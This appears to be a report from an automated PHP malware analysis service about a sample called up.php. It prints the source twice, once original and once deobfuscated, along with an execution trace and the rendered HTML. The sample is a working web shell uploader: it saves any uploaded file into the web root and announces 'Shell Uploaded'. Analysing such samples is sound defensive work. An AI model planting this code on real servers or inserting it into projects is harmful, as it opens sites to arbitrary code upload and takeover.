PHP Malware Analysis

up.php

md5: b2670b77e5f7806111d46165957876bb

Jump to:

Screenshot


Attributes

Files

Input

Title


Deobfuscated PHP code

<title>Vuln!! patch it Now!</title><?php 
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Shell Uploaded ! :)<b><br><br>";
    } else {
        echo "<b>Not uploaded ! </b><br><br>";
    }
}

Execution traces

data/traces/b2670b77e5f7806111d46165957876bb_trace-1676249125.0247.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:45:50.922506]
1	0	1	0.000146	393464
1	3	0	0.000200	395720	{main}	1		/var/www/html/uploads/up.php	0	0
1	3	1	0.000233	395720
			0.000259	314200
TRACE END   [2023-02-12 22:45:50.922648]


Generated HTML code

<html><head><title>Vuln!! patch it Now!</title></head><body><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></body></html>

Original PHP code

<title>Vuln!! patch it Now!</title><?php echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }else { echo '<b>Not uploaded ! </b><br><br>'; }}?>